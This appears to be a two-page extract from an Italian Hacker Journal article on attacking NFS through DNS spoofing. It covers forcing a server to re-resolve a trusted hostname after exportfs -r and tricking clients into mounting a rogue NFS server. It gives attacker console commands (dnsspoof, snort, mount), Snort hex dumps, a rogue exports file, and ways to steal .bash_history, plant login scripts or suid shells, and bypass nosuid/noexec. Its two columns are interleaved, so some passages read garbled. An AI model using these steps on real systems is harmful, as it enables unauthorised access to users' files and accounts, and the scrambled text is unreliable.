tempo successivo all’ esecuzione del demone mountd, questo UDP TTL:64 TOS:0x0 ID:429 IpLen:20 DgmLen:114
può verificarsi a causa di uno script inaffidabile o per mano Len: 94
dell’admin che richiama tale comando da console. Ho effet- 28 CB 85 80 00 01 00 01 00 01 00 01 05 74 72 75
tuato questa scoperta in maniera del tutto casuale durante i (............tru
probe che ho effettuato lungo il corso della stesura del pre- 73 74 08 6C 69 6E 75 78 62 6F 78 03 63 6F 6D 00 st.li-
sente articolo, premetto che ho avuto modo di testare il pre- nuxbox.com.
sunto bug solo su un sistema che monta Slackware8.0 e ker- 00 01 00 01 C0 0C 00 01 00 01 00 01 51 80 00 04
nel 2.4.17. ............Q...
Ecco un esempio, mettiamo che l’admin decida di modificare C0 A8 01 06 C0 12 00 02 00 01 00 01 51 80 00 06
il file /etc/exports e di conseguenza debba aggiornare le ta- ............Q...
belle delle condivisioni con l’ausilio di exportfs -r senza prima 03 64 6E 73 C0 12 C0 40 00 01 00 01 00 01 51 80
provvedere all’ arresto dei demoni interessati: .dns...@......Q.
00 04 C0 A8 01 05 ......
victim@victim:~# exportfs -r
Facciamo il punto della situazione:
Come possiamo vedere dall’output di Snort riportato qui di se- - i demoni erano in esecuzione
guito, il file /etc/exports viene processato e l’hostname (trust) - viene richiamato exportfs -r
contenuto in esso viene risolto nell’IP corrispondente - trust.linuxbox.com viene risolto in 192.168.1.6 - tale IP viene
(192.168.1.6): memorizzato per impedire query durante le richieste di mount
che potranno verificarsi in futuro e che sarebbero altriementi
attacker@attack:~# snort -vd udp port 53 soggette a vulnerabilità dovute al DNS spoofing
02/20-14:49:48.213636 192.168.1.7:1079 -> 192.168.1.5:53 - prima richiesta di mount
UDP TTL:236 TOS:0x0 ID:19927 IpLen:20 DgmLen:64 DF - viene nuovamente richiesta la risoluzione di trust!!!
Len: 44
CD 39 01 00 00 01 00 00 00 00 00 00 05 74 72 75 In parole povere, se exportfs -r è stato richiamato mentre mountd
30 | www.hackerjournal.it
>>
era in esecuzione, e siamo i primi a richiedere il mount, allora attacker@attack:~# dnsspoof -f ~/hosts.txt
causeremo una query DNS da parte di victim e saremo in grado dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.4
di fornire una risposta arbitraria avvalendosi di Dnsspoof e per-
mettendo il mount del filesystem da parte dell’host desiderato! La vittima richiede di montare la porzione di filesystem /home/ftp
per esempio, l’admin ha appena modificato il file delle esporta- dal sistema trust...
zioni e desidera che le modifiche apportate abbiano effetto, a ta-
le scopo esegue il comando necessario (il demone mountd è in victim@victim:~# mount trust.linuxbox.com:/home/ftp /mnt/nfs
esecuzione): victim@victim:~#
victim@victim:~# exportfs -r ...in realtà la sua richiesta viene inoltrata a 192.168.1.4, IP sug-
geritogli dalla reply fasulla forgiata da Dnsspoof:
Terminata l’esecuzione del comando exportfs, l’attacker pone
Dnsspoof in ascolto sull’interfaccia di rete e... attacker@attack:~# dnsspoof -f ~/hosts.txt
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.4]
attacker@attack:~# dnsspoof -f ~/hosts.txt 192.168.1.7.1034> 192.168.1.5.53: 62600+ A? trust.linuxbox.com
dnsspoof: listening on eth0 [udp dst port 53 and not src
192.168.1.4] Una pratica comune che sarebbe bene evitare è quella di in-
serire una voce in /etc/fstab che esegua il mount di un filesy-
...si prepara a richiedere il mount: stem NFS, il fatto stesso di automatizzare l’operazione espone
i client NFS a rischi ancora maggiori.
attacker@attack:~# mount 192.168.1.7:/home/ftp /mnt/nfs Ora vi starete chiedendo, “che interessi può avere un utente
attacker@attack:~# malizioso ad ingannare un client NFS al fine di forzare il
mount di un filesystem differente da quello previsto”? Ecco al-
le query rivolte a risolvere l’hostname di trust.linuxbox.com ven- cuni esempi:
gono intercettate e le risposte fasulle vengono inviate al server 1) Molti sistemi con funzione di workstation montano le /home
NFS victim che permette il mount da parte del sistema attacker: degli utenti da remoto durante il boot; se un attacker fosse in
grado di forzare il mount in lettura/scrittura di una home fitti-
attacker@attack:~# dnsspoof -f ~/hosts.txt zia che si trova sul proprio sistema, potrebbe venire in posses-
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.4] so di dati di fondamentale importanza per l’integrità dell’ac-
192.168.1.7.1034 > 192.168.1.5.53: 43182+ A? trust.linuxbox.com count utente attaccato, quali ad esempio .bash_history.
192.168.1.7.1034 > 192.168.1.5.53: 43183+ A? trust.linuxbox.com 2) Come nell’esempio precedente, se l’attacker fosse in grado
di montare una directory home fittizia potrebbe inserire in es-
sa script come .bash_profile o .bashrc in grado di eseguire po-
>> NFS client bypass tenzialmente qualsiasi operazione al momento del login.
3) Se l’attacker ha accesso al sistema victim come utente ge-
Ora la situazione si è invertita, la vittima è il client NFS e deve nerico e tale sistema, in seguito alla presenza di una voce nel
accedere al server NFS trust.linuxbox.com al quale ha accesso file /etc/fstab, esegue un mount automatico tramite NFS, po-
regolare. Lo scopo di colui che attacca è quello di far connette- trà essere forzato a montare un filesystem aggressivo al fine di
re in maniera del tutto inconsapevole la vittima a un server NFS mettere a disposizione di attacker file potenzialmente dannosi
fasullo. Nell’esempio il server NFS “aggressivo” si trova sul si- per la sicurezza stessa del sistema, per esempio suid shell o
stema stesso dell’attacker da cui partirà l’attacco di DNS spoo- script perl setuserid. L’utilizzo delle opzioni nosuid e noexec del
fing. Ancora una volta condizione necessaria alla riuscita del- comando mount non sempre offrono la sicurezza sperata, e
l’attacco è data dall’utilizzo del nome host da parte del lato possono essere aggirate agilmente con semplici accorgimenti:
client NFS al fine di accedere alle risorse remote. L’attacker de-
ve disporre sul server NFS fasullo (il sistema attack.linuxbox.com) - nosuid NON impedisce l’esecuzione di script Perl tramite
un file exports che permetta l’accesso inconsapevole della vittima: Suidperl
- noexec NON impedisce che i file dannosi vengano copiati su
/etc/exports: un altro filesystem dove potranno essere eseguiti.
/home/ftp 192.168.1.7(ro)
www.hackerjournal.it | 31